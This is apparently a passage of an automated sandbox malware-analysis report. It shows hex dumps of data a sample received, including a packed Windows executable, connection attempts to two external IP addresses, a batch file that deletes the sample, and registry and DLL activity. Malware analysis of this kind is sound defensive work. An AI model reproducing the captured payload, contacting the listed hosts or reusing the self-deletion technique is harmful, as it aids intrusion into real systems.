7536 5021 03bd 1683 d87b f6db c9ff 57f2    u6P!.....{....W.
aef7 d149 2651 5031 40ec cd9c fb6a 0268    ...I&QP1@....j.h
2cd0 0fd0 bd47 4a5e c809 24fe 24fe 6490    ,....GJ^..$.$.d.
0b19 ec30 ec71 3742 86ec 3ae8 5c07 406e    ...0.q7B..:.\.@n
07c3 5320 eb4d 3c48 fc0f 0b13 fe83 f902    ..S .M<H........
7638 2434 189b 10d8 8c71 332d 0820 f404    v8$4.....q3-. ..
ffd0 b075 076b 9214 23e8 713e 840f 04c9    ...u.k..#.q>....
4637 e96f 6aa0 e88e 006e faed ee85 bd11    F7.oj....n......
5f5b 8a1d 5ec9 c204 00b8 83ec 64dc 67eb    _[..^.......d.g.
de96 9c6a 6426 0850 bc75 0c11 756d 84e7    ...jd&.P.u..um..
5de4 cc0f b501 10fa 6dc1 8c21 c0b9 583d    ].......m..!..X=
0800 b824 2abf e4be 6cf3 af06 83bc 2430    ...$*...l.....$0
0bf7 5774 736a 2fd9 9e05 f7ff b424 3c0d    ..Wtsj/......$<.
cf78 f042 f63f db61 615c e380 f255 b046    .x.B.?.aa\...U.F
5968 9bed 6cdb 5037 0756 2374 3038 590f    Yh..l.P7.V#t08Y.
affb 748d b71a 1244 f857 0940 e6a4 ef9d    ..t....D.W.@....
7d08 3cef 3806 4454 dcf0 2c77 610c 25e9    }.<.8.DT..,wa.%.
107e 6a53 5537 587f d759 4c55 8d44 241c    .~jSU7X..YLU.D$.
6844 3771 100e 3ff9 ec73 1468 4068 3c1d    hD7q..?..s.h@h<.
7c68 308d 8424 8447 b657 70b6 8f0e 5570    |h0..$.G.Wp...Up
1cbd f36c 76bb 280e bb24 04bf 2068 1c18    ...lv.(..$.. h..
e6f3 3ccf 100c 0400 fc36 9ee7 799e f8f4    ..<......6..y...
f0ec e8e4 799e e779 e0dc d8d0 c8bd 799e    ....y..y......y.
e7c4 c0b8 b055 53ba a8f3 fdd6 dd06 57b9    .....US.......W.
a405 89ab 7452 51b8 9c1c 94b1 db45 5950    ....tRQ......EYP
5957 4b68 8c46 90e7 79be 8841 8480 7c74    YWKh.F..y..A..|t
92a9 9221 948c 799e 67fb 031c 0088 6c68    ...!..y.g.....lh
645c 7350 b60a 468c dc26 b081 5658 369d    d\sP..F..&..VX6.
0450 36f3 3ccf d34c 4844 3c38 3e63 05cc    .P6.<..LHD<8>c..
3482 7b2c ab00 799e ef69 2820 041c 1814    4.{,..y..i( ....
fc9e b1e7 100c 2d04 0004 fc35 f33c cfd3    ......-....5.<..
f4f0 ece4 e0be efb0 cfdc d435 c7d0 09cc    ...........5....
04c4 7598 e779 c0bc b4c1 b4ed c163 8cfb    ..u..y.......c..
32d0 81c4 88ac 14e0 6b32 cd38 0168 1364    2.......k2.8.h.d
0620 f33c df59 e932 0458 504c 9adb 83d9    . .<.Y.2.XPL....
283b 2738 4c06 e8d8 91a6 2688 50c6 4034    (;'8L.....&.P.@4
2067 b4c9 74dd 6459 5021 502c c420 ee0d     g..t.dYP!P,. ..
f68d 4b70 1268 1a6c 0714 f37d 27bf 200c    ..Kp.h.l...}'. .
4801 2804 2c16 303b c837 c858 3838 8c60    H.(.,.0;.7.X88.`
1a70 a5ce 6ce5 7457 6c09 448e 769d 8991    .p..l.tWl.D.v...
6838 b966 5772 3020 d8f3 3c1b 5f20 3232    h8.fWr0 ..<._ 22
3232 9cb4 77d8 c3e4 8400 c818 76f9 d992    22..w.......v...
f52c 6731 3109 27d4 e0a5 b985 0211 2702    .,g11.'.......'.
6a1a 68c0 5777 560e 8e48 5f2c 783d 5928    j.h.WwV..H_,x=Y(
e0e0 54fd 579c 31cf f33c df04 e8e4 e0dc    ..T.W.1..<......
d83c cff3 3cd4 d0cc c8c4 6930 cff3 c0bc    .<..<.....i0....
b891 d8b9 ebb6 ef80 8bc7 6d64 0c00 0768    ..........md...h
0010 ef2b 755f 9b44 823c 452f 78b4 beb3    ...+u_.D.<E/x...
3192 70dd 3120 64f3 6d0d 7958 db54 6550    1.p.1 d.m.yX.TeP
0bcb 1a86 62b2 3988 24f3 6c49 3e38 0a86    ....b.9.$.lI>8..
a840 cd43 77ba 58e8 1080 0144 08f8 ee83    .@.Cw.X....D....
61fb 2bb1 1d83 caff bf38 ff07 eebf b1ca    a.+......8......
8d9c 2434 4896 2bf9 8be9 8bf7 8b6b 0fbd    ..$4H.+......k..
b5fb 140d 8bcd 4f05 a507 20b0 d80f 050a    ......O... .....
a4bf 3033 2cb2 f620 79f7 8be9 8d7c fa2b    ..03,.. y....|.+
e0ad 3324 1a28 5029 68b9 139b 7cfc f8fd    ..3$.(P)h...|...
b807 8813 9b28 4bde 60b9 c1fc 74f5 5d13    .....(K.`...t.].
5b5f 5eee 0b1f 9407 9bc2 5ccc ff25 5822    [_^.......\..%X"
1f0e d66c 0560 cc00 513d 768d 4c7f ecf7    ...l.`..Q=v.L...
fd24 0872 1481 e90b 2d04 8501 1773 ec2b    .$.r....-....s.+
c88b c49b f846 6f0c 8be1 8bc4 4004 50c3    .....Fo.....@.P.
256a ffb5 cb43 0be4 202d 1c64 a123 1b5c    %j...C.. -.d.#.\
e2dd 6d64 8925 073f 6853 f689 3f1b 34fe    ..md.%.?hS..?.4.
65e8 33db 895d fc54 e0a4 830d 809f 8db3    e.3..].T........
b937 7606 845a a00d 7c1d 19d9 760c 8908    .7v..Z..|...v...
0d9c 78a1 98e1 6ed8 fd0c 00a3 880d e811    ..x...n.........
8c39 1d60 0a7c 3657 2a84 ab6c 4e94 e8e3    .9.`.|6W*..lN...
ed36 5f3c a90c 0008 e8ce 0ea1 74c2 5d96    .6_<........t.].
f83f 4594 ac94 3570 0c7d 0dcd 76b6 0390    .?E...5p.}..v...
a0cb 8cb0 047f 17de f332 009b ac16 a188    .........2......
6e30 8975 db16 effe 8c80 3e22 753a 4608    n0.u......>"u:F.
8a06 3ac3 313c 0df2 dbf6 807c 1204 2076    ..:.1<.....|.. v
f2d4 d04e a47d 89df 3448 f645 d001 7411    ...N.}..4H.E..t.
a645 d4eb 0ee9 12ff bc2b 2076 d8eb f56a    .E.......+ v...j
0a58 b753 5340 755b b930 86e4 f797 9833    .X.SS@u[.0.....3
84c3 df50 ea6b 1547 0989 4d88 5051 e85e    ...P.k.G..M.PQ.^
db16 8537 cc59 c38b 2e4c 881f 7cdb 1b69    ...7.Y...L..|..i
30a1 8090 af1e 0376 61b6 7d04 01af 0d2a    0......va.}....*
cec3 c321                                  ...!
Data received:
    
00e9 dec8 a8ac 2e00 001a 6886 8aff 1d7c    ..........h....|
3142 4580 d503 69bf 208a b05e 7368 6c77    1BE...i. ..^shlw
edf3 ffff 6170 6900 5061 7468 4973 4469    ....api.PathIsDi
7265 6374 6f72 7941 0d0a 046f 976d f925    rectoryA...o.m.%
7373 6572 7002 666e 6503 726b 2eba edee    sserp.fne.rk....
f225 736f 7879 700d 3129 3b23 752b 5fe5    .%soxyp.1);#u+_.
2fb7 e603 3b07 2822 7477 6f00 7072 9b8b    /...;.("two.pr..
edfe 792e 7400 222c 2043 725f 3f18 3b2e    ..y.t.", Cr_?.;.
b1ce b99b 702e 6874 540d 0164 43da 6bae    ....p.htT..dC.k.
6b66 3365 3f64 7b66 addd b6e6 0366 4b70    kf3e?d{f.....fKp
5972 7454 4673 6673 df37 3117 7531 2666    YrtTFsfs.71.u1&f
8598 6edb b9ae 7243 684a 6722 6c07 61af    ..n...rChJg"l.a.
ddbe 9b6b 024f b45f 702f 6573 006b 5c6e    ...k.O._p/es.k\n
5bb9 7200 784b 749f 6f63 6c68 35d7 baad    [.r.xKt.oclh5...
5229 975c 0223 77fc bd8d 8d35 732f 6603    R).\.#w....5s/f.
2e6a 001b 2a2e 2ac2 bf77 bf69 6c6c 615c    .j..*.*..w.illa\
175c 4d6f 7a1f 4170 7044 2acd e00a ee61    .\Moz.AppD*....a
002f 363d 3e23 2e38 b775 1753 0b65 1282    ./6=>#.8.u.S.e..
0348 47b7 b9b7 6b56 ab65 41fb 17c7 4624    .HG...kV.eA...F$
8e70 6c6c 666f 2774 2a63 7212 5769 ebba    .pllfo't*cr.Wi..
eedb 0377 8772 0f56 176f d870 35c1 7d3b    ...w.r.V.o.p5.};
37d7 4f6c 649a 6f97 a86d e76e 6e72 8748    7.Old.o..m.nnr.H
6f73 bf94 6e64 07b7 dd6e dd43 75b3 6ed8    os..nd...n.Cu.n.
7273 175c 4567 6c63 39c3 db76 725c 5313    rs.\Eglc9..vr\S.
6c07 2046 6f07 87cd 95a8 b040 3365 2d0c    l. Fo......@3e-.
7e86 edd6 996e bd54 0275 749f 536d 9d7b    ~....n.T.ut.Sm.{
84dd 644d 1b61 6777 696d 6541 ff25 b275    ..dM.agwimeA.%.u
8708 13a1 0979 416d ddcf b9ee 5c72 496c    .....yAm....\rIl
4a41 2353 79e7 65b5 e60c df6d 520b 6f5b    JA#Sy.e....mR.o[
7647 10f7 76db cd97 7c2e 658b 2239 2220    vG..v...|.e."9" 
4143 8ef6 7ddf 74dc 740a 5c4f 32f3 0b70    AC..}.t.t.\O2..p
78d7 704a 6591 6820 6164 3edb 8fd9 f7d0    x.pJe.h ad>.....
676c 733b 204c 4522 25e6 5638 9873 1503    gls; LE"%.V8.s..
0a64 64ee 753f 1aa5 7f67 20c7 3027 1260    .dd.u?...g .0'.`
165c ec4e 4142 4e17 4f69 d8fd 70ad bb56    .\.NABN.Oi..p..V
1967 6e69 6543 5026 b7b1 d645 bd2d 457c    .gnieCP&...E.-E|
424c 8fb6 61f8 5a77 866a 20d7 dbc7 c7df    BL..a.Zw.j .....
8c79 560c 723d 22a9 6357 bd1d dac7 74ab    .yV.r=".cW....t.
2231 9a44 2248 4b86 18ee b98f 6674 4d1c    "1.D"HK.....ftM.
ca90 efc1 151c 3792 4bca 6ef4 3c8d 7076    ......7.K.n.<.pv
a920 530a 7239 76be 85e7 2e87 202f de59    . S.r9v..... /.Y
af63 5a3a be28 30e7 594e 5c79 4f76 7e18    .cZ:.(0.YN\yOv~.
5ceb 3f65 5e43 bb9b 3b3c dbaa c01e b53e    \.?e^C..;<.....>
5e02 45be 5d9d 734f 5c08 478d 4f52 4c30    ^.E.].sO\.G.ORL0
331e 8bc2 5832 9bc7 c3b4 7d4c 6d10 3a74    3...X2....}Lm.:t
74eb 183b 5a24 1c09 7769 73ed 351e cd36    t..;Z$..wis.5..6
670b 5f63 eeb9 6bd2 9b82 205b 2f31 203e    g._c..k... [/1 >
6f07 98a6 a552 6d9e 7374 33bb 6efa 6ade    o....Rm.st3.n.j.
df73 f377 6564 ed72 61d9 646a 6e03 2022    .s.wed.ra.djn. "
4509 946e 652e bd93 6b66 7706 3f07 7200    E..ne...kfw.?.r.
c37c 6a6a 0006 38bf 4c45 fcdb 32b9 5a2f    .|jj..8.LE..2.Z/
5b58 0764 43ad 35b9 9357 1b58 0045 6307    [X.dC.5..W.X.Ec.
5ae9 ce45 004b 68f7 d5b9 c082 735f 6bad    Z..E.Kh.....s_k.
2d9f 7665 2b34 f0ab 3d72 003a 9e79 161f    -.ve+4..=r.:.y..
e081 df16 fe00 1700 6168 005d e9f5 7c8b    ........ah.]..|.
7269 2a27 4aaf 63ef 3ddf 6e43 2f00 8755    ri*'J.c.=.nC/..U
5c53 6f4d 0773 915b 1fb8 6181 475c 8763    \SoM.s.[..a.G\.c
7263 aed7 6a3a dd07 df0f 5cf9 c135 db49    rc..j:....\..5.I
6e77 6e74 c81b 7620 5096 3737 c73e a361    nwnt..v P.77.>.a
6252 0044 5744 81ad 80eb 6031 0332 b72c    bR.DWD....`1.2.,
93dd 0cb4 ae5f 0363 7617 9c66 20f9 0d9a    ....._.cv..f ...
739c 002b 576f 746f 203a 700d 74dd 1b64    s..+Woto :p.t..d
f866 5857 ad3a 4cce 1593 0317 408b 62b5    .fXW.:L.....@.b.
ccc2 57e3 5c0b 61de 88d3 6078 0957 8464    ..W.\.a...`x.W.d
a00a 90cb 2601 ef0a 15ba 0371 c701 4d5a    ....&......q..MZ
9000 3511 a6a1 0303 04af b876 0032 0817    ..5........v.2..
4001 0405 78f9 ff0e 1fba 0e00 b409 cd21    @...x..........!
b801 4c54 6869 be1b dda8 0112 da6d 2039    ..LThi.......m 9
6edb 2f75 a16e ae20 626b 7275 6e20 6902    n./u.n. bkrun i.
44d8 5217 fa4f 5320 6d6f b52e 0d26 2442    D.R..OS mo...&$B
bb3f ec3f efac 54e0 abcd 3ab3 03d0 d136    .?.?..T...:....6
b3a8 07c4 d21f b91b ec3e b3a9 13ad 0f28    .........>.....(
d134 43d2 30b3 fcd8 67b1 af07 1ffd d229    .4C.0...g......)
0fab cd3b b3e2 72f3 5dd3 c9a2 079d eb31    ...;..r.]......1
b3aa 54ed 3e8e ec6d 3452 a068 4bc2 500e    ..T.>..m4R.hK.P.
fbc2 a630 4c01 012e 48c2 4913 e03a d56c    ...0L...H.I..:.l
dfd5 210b 0106 0c30 1088 58e7 829a 43aa    ..!....0..X...C.
d203 b022 92bd c3d8 1017 0237 0007 0bd2    ...".......7....
05d9 33c0 2a03 029b f06c d907 0624 b263    ..3.*....l...$.c
4f51 7785 f024 0262 6427 0c6f e403 84a3    OQw..$.bd'.o....
5550 5830 7090 9ae5 6c64 c427 80e0 31b9    UPX0p...ld.'..1.
b2ef 452d ff2e 2740 b2c1 263b 32dc b023    ..E-..'@..&;2..#
3227 07a2 909a c06e 332e 4bff ffc3 3032    2'.....n3.K...02
e721 0d09 020a 3091 95ff 0234 02a5 518b    .!....0....4..Q.
bf1b 4d7f 599a 2a62 493a e577 dbfd e8c7    ..M.Y.*bI:.w....
06ff 6ffc ffe9 0410 b903 5f48 097f 68b9    ..o......._H..h.
9cec ddef 1832 6e59 c315 26b8 34c1 deff    .....2nY..&.4...
ffff adb9 188c 5156 8bf1 8975 f08d 4e38    ......QV...u..N8
c745 fc02 2c15 2f06 6a01 9ebf bd17 fe16    .E..,./.j.......
f4dc 1020                                  ... 
Data received:
    
Data received:
    
Data received:
    
Data received:
    
Data received:
    
Data received:
    
Data received:
    
Data received:
    
Data received:
    
Data received:
    

  -  TCP Connection Attempts:  
from ANUBIS:1034 to 58.241.255.37:80
from ANUBIS:1036 to 212.58.23.82:80

4. cmd.exe

  - General information about this executable  
Analysis Reason: Started by sample.exe 
Filename: cmd.exe 
MD5: 6d778e0f95447e6546553eeea709d03c 
SHA-1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1 
File Size: 389120 Bytes
Command Line: cmd /c c:\353454543.bat 
Process-status at analysis end: dead 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 

4.a) cmd.exe - Registry Activities

  - Registry Values Read:  
Key Name Value Times
HKLM\​Software\​Microsoft\​Command Processor  AutoRun   
HKLM\​Software\​Microsoft\​Command Processor  CompletionChar  64 
HKLM\​Software\​Microsoft\​Command Processor  DefaultColor 
HKLM\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKLM\​Software\​Microsoft\​Command Processor  PathCompletionChar  64 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  DefaultLevel  262144 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers  PolicyScope 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Language Groups 
HKLM\​System\​CurrentControlSet\​Control\​Nls\​Locale  00000409 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  CompletionChar 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  DefaultColor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Command Processor  EnableExtensions 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders  Cache  C:\​Documents and Settings\​user\​Local Settings\​Temporary Internet Files 

4.b) cmd.exe - File Activities

  - Files Deleted:  
C:\sample.exe
c:\353454543.bat

  - Files Read:  
c:\353454543.bat

  - Memory Mapped Files:  
File Name
c:\353454543.bat

5. services.exe

  - General information about this executable  
Analysis Reason: NtConnectPort(\RPC Control\ntsvcs was called. 
Filename: services.exe 
MD5: 0e776ed5f7cc9f94299e70461b7b8185 
SHA-1: cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf 
File Size: 108544 Bytes
Command Line: C:\WINDOWS\system32\services.exe 
Process-status at analysis end: alive 
Exit Code:

  - Load-time Dlls  
Module Name Base Address Size
C:\​WINDOWS\​system32\​ntdll.dll  0x7C900000  0x000AF000 
C:\​WINDOWS\​system32\​kernel32.dll  0x7C800000  0x000F6000 
C:\​WINDOWS\​system32\​ADVAPI32.dll  0x77DD0000  0x0009B000 
C:\​WINDOWS\​system32\​RPCRT4.dll  0x77E70000  0x00092000 
C:\​WINDOWS\​system32\​Secur32.dll  0x77FE0000  0x00011000 
C:\​WINDOWS\​system32\​msvcrt.dll  0x77C10000  0x00058000 
C:\​WINDOWS\​system32\​NCObjAPI.DLL  0x5F770000  0x0000C000 
C:\​WINDOWS\​system32\​MSVCP60.dll  0x76080000  0x00065000 
C:\​WINDOWS\​system32\​SCESRV.dll  0x7DBD0000  0x00051000 
C:\​WINDOWS\​system32\​AUTHZ.dll  0x776C0000  0x00012000 
C:\​WINDOWS\​system32\​USER32.dll  0x7E410000  0x00091000 
C:\​WINDOWS\​system32\​GDI32.dll  0x77F10000  0x00049000 
C:\​WINDOWS\​system32\​USERENV.dll  0x769C0000  0x000B4000 
C:\​WINDOWS\​system32\​umpnpmgr.dll  0x7DBA0000  0x00021000 
C:\​WINDOWS\​system32\​WINSTA.dll  0x76360000  0x00010000 
C:\​WINDOWS\​system32\​NETAPI32.dll  0x5B860000  0x00055000 
C:\​WINDOWS\​system32\​ShimEng.dll  0x5CB70000  0x00026000 
C:\​WINDOWS\​AppPatch\​AcAdProc.dll  0x47260000  0x0000F000 
C:\​WINDOWS\​system32\​IMM32.DLL  0x76390000  0x0001D000 
C:\​WINDOWS\​system32\​Apphelp.dll  0x77B40000  0x00022000 
C:\​WINDOWS\​system32\​VERSION.dll  0x77C00000  0x00008000 
C:\​WINDOWS\​system32\​eventlog.dll  0x77B70000  0x00011000 
C:\​WINDOWS\​system32\​PSAPI.DLL  0x76BF0000  0x0000B000 
C:\​WINDOWS\​system32\​WS2_32.dll  0x71AB0000  0x00017000 
C:\​WINDOWS\​system32\​WS2HELP.dll  0x71AA0000  0x00008000 
C:\​WINDOWS\​system32\​wtsapi32.dll  0x76F50000  0x00008000 

5.a) services.exe - Registry Activities

  - Registry Keys Created:  
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_TAPISRV\​0000\​Control
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_RASMAN\​0000\​Control

  - Registry Values Modified:  
Key Name New Value
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_RASMAN\​0000\​Control  ActiveService  RasMan 
HKLM\​System\​CurrentControlSet\​Enum\​Root\​LEGACY_TAPISRV\​0000\​Control  ActiveService  TapiSrv 

  - Registry Values Read:  
Key Name Value Times
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0303\​4&2C5A7332&0  ClassGUID  {4D36E96B-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0400\​4&2C5A7332&0  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0501\​1  ClassGUID  {4D36E978-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0700\​4&2C5A7332&0  ClassGUID  {4D36E969-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0A03\​1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI\​PNP0F13\​4&2C5A7332&0  ClassGUID  {4D36E96F-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ACPI_HAL\​PNP0C08\​0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​DISPLAY\​DEFAULT_MONITOR\​4&2946A9FF&0&11223344&00&02  ClassGUID  {4D36E96E-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​IDE\​CDROMQEMU_QEMU_CD-ROM________________________0.9.____\​4D51303030302033202020202020202020202020  ClassGUID  {4D36E965-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​IDE\​DISKQEMU_HARDDISK___________________________0.9.1___\​4D51303030302031202020202020202020202020  ClassGUID  {4D36E967-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ISAPNP\​READDATAPORT\​0  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​LPTENUM\​MICROSOFTRAWPORT\​5&34A37E9F&0&LPT1  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCIIDE\​IDECHANNEL\​4&3DE75EA&0&0  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCIIDE\​IDECHANNEL\​4&3DE75EA&0&1  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_1013&DEV_00B8&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&10  ClassGUID  {4D36E968-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  ClassGUID  {4D36E972-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  DeviceDesc  Realtek RTL8029(AS)-based Ethernet Adapter (Generic) 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_10EC&DEV_8029&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&18  Driver  {4D36E972-E325-11CE-BFC1-08002BE10318}\​0001 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_1237&SUBSYS_00000000&REV_02\​3&13C0B0C5&0&00  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_7000&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&08  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​PCI\​VEN_8086&DEV_7010&SUBSYS_00000000&REV_00\​3&13C0B0C5&0&09  ClassGUID  {4D36E96A-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​ACPI_HAL\​0000  ClassGUID  {4D36E966-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​DMIO\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​FTDISK\​0000  ClassGUID  {4D36E97D-E325-11CE-BFC1-08002BE10318} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_AFD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_BEEP\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_DMBOOT\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_DMLOAD\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
HKLM\​SYSTEM\​CONTROLSET001\​ENUM\​ROOT\​LEGACY_FIPS\​0000  ClassGUID  {8ECC055D-047F-11D1-A537-0000F8753ED1} 
